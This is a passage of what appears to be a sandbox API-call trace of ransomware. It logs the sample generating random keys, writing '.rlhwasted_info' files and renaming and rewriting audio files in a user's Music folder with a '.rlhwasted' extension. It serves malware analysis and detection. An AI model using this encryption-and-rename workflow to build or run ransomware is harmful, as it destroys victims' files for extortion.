(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\KGOxrl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\kgoxrl.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\KGOxrl.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\kgoxrl.mp3.rlhwasted")) returned 1 [0195.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\KGOxrl.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\kgoxrl.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.161] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0195.161] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x13794 [0195.161] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13794) returned 0xb00000 [0195.161] CloseHandle (hObject=0x104) returned 1 [0195.168] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0195.169] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0195.169] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.169] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0195.170] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.170] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.181] SetEndOfFile (hFile=0x128) returned 1 [0195.184] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.184] CloseHandle (hObject=0x128) returned 1 [0195.186] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0195.186] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70a760 | out: hHeap=0x6b0000) returned 1 [0195.186] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0195.188] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.188] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\3XDF63xGn3E9rz6Ljyc5.m4a") returned 99 [0195.188] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2d0) returned 0x6e8978 [0195.188] lstrcpyW (in: lpString1=0x6e8a3e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.188] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6edd68 [0195.188] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0195.189] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6edd68 | out: pbBuffer=0x6edd68) returned 1 [0195.189] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\3XDF63xGn3E9rz6Ljyc5.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\3xdf63xgn3e9rz6ljyc5.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.190] WriteFile (in: hFile=0x128, lpBuffer=0x6edd68*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6edd68*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.191] SetEndOfFile (hFile=0x128) returned 1 [0195.191] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.191] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.191] lstrcpyW (in: lpString1=0x6e8a3e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\3XDF63xGn3E9rz6Ljyc5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\3xdf63xgn3e9rz6ljyc5.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\3XDF63xGn3E9rz6Ljyc5.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\3xdf63xgn3e9rz6ljyc5.m4a.rlhwasted")) returned 1 [0195.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\3XDF63xGn3E9rz6Ljyc5.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\3xdf63xgn3e9rz6ljyc5.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0195.193] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0195.193] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x14cea [0195.193] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14cea) returned 0xb00000 [0195.193] CloseHandle (hObject=0x12c) returned 1 [0195.247] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0195.248] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0195.248] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.248] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0195.249] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.249] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.260] SetEndOfFile (hFile=0x128) returned 1 [0195.263] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.263] CloseHandle (hObject=0x128) returned 1 [0195.265] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0195.265] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x709d98 | out: hHeap=0x6b0000) returned 1 [0195.265] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0195.266] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.266] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.266] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\A0eWtftu1q9drJqk5.mp3") returned 96 [0195.266] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ca) returned 0x6e8978 [0195.266] lstrcpyW (in: lpString1=0x6e8a38, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.266] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.266] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0195.267] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.267] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\A0eWtftu1q9drJqk5.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\a0ewtftu1q9drjqk5.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.268] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.269] SetEndOfFile (hFile=0x128) returned 1 [0195.270] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.270] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.270] lstrcpyW (in: lpString1=0x6e8a38, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\A0eWtftu1q9drJqk5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\a0ewtftu1q9drjqk5.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\A0eWtftu1q9drJqk5.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\a0ewtftu1q9drjqk5.mp3.rlhwasted")) returned 1 [0195.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\A0eWtftu1q9drJqk5.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\a0ewtftu1q9drjqk5.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.271] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0195.271] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x7b0f [0195.271] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b0f) returned 0x6a0000 [0195.271] CloseHandle (hObject=0x104) returned 1 [0195.277] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0195.278] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0195.278] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.279] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0195.280] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.280] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.404] SetEndOfFile (hFile=0x128) returned 1 [0195.406] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.406] CloseHandle (hObject=0x128) returned 1 [0195.408] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0195.408] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70aaa0 | out: hHeap=0x6b0000) returned 1 [0195.408] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0195.409] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.409] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\otuk0nxp p1pit6.wav") returned 94 [0195.409] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c6) returned 0x6d56f0 [0195.410] lstrcpyW (in: lpString1=0x6d57ac, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.410] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.410] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0195.410] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.411] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\otuk0nxp p1pit6.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\otuk0nxp p1pit6.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.414] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.416] SetEndOfFile (hFile=0x128) returned 1 [0195.416] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.416] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.416] lstrcpyW (in: lpString1=0x6d57ac, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\otuk0nxp p1pit6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\otuk0nxp p1pit6.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\otuk0nxp p1pit6.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\otuk0nxp p1pit6.wav.rlhwasted")) returned 1 [0195.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\otuk0nxp p1pit6.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\otuk0nxp p1pit6.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0195.417] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0195.417] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x4c4b [0195.417] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c4b) returned 0x6a0000 [0195.417] CloseHandle (hObject=0x12c) returned 1 [0195.420] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0195.421] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0195.421] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.421] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0195.422] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.422] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.431] SetEndOfFile (hFile=0x128) returned 1 [0195.434] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.434] CloseHandle (hObject=0x128) returned 1 [0195.435] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56f0 | out: hHeap=0x6b0000) returned 1 [0195.436] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70adf8 | out: hHeap=0x6b0000) returned 1 [0195.436] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0195.437] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.437] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.437] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\PoOpQS-BjYvqFXbwr.m4a") returned 80 [0195.437] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0195.437] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.437] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.437] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0195.438] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.438] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\PoOpQS-BjYvqFXbwr.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\poopqs-bjyvqfxbwr.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.439] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.440] SetEndOfFile (hFile=0x128) returned 1 [0195.440] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.440] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.440] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.440] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\PoOpQS-BjYvqFXbwr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\poopqs-bjyvqfxbwr.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\PoOpQS-BjYvqFXbwr.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\poopqs-bjyvqfxbwr.m4a.rlhwasted")) returned 1 [0195.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\PoOpQS-BjYvqFXbwr.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\poopqs-bjyvqfxbwr.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.441] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0195.441] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xa252 [0195.441] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa252) returned 0x6a0000 [0195.442] CloseHandle (hObject=0x104) returned 1 [0195.445] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0195.445] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0195.445] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.446] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0195.497] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.497] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.505] SetEndOfFile (hFile=0x128) returned 1 [0195.507] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.507] CloseHandle (hObject=0x128) returned 1 [0195.508] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0195.509] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x700a68 | out: hHeap=0x6b0000) returned 1 [0195.509] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0195.510] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.510] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\X1j1LLo4F5qLaTkwx.m4a") returned 80 [0195.510] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0195.510] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.510] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6edd68 [0195.510] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0195.510] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6edd68 | out: pbBuffer=0x6edd68) returned 1 [0195.510] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 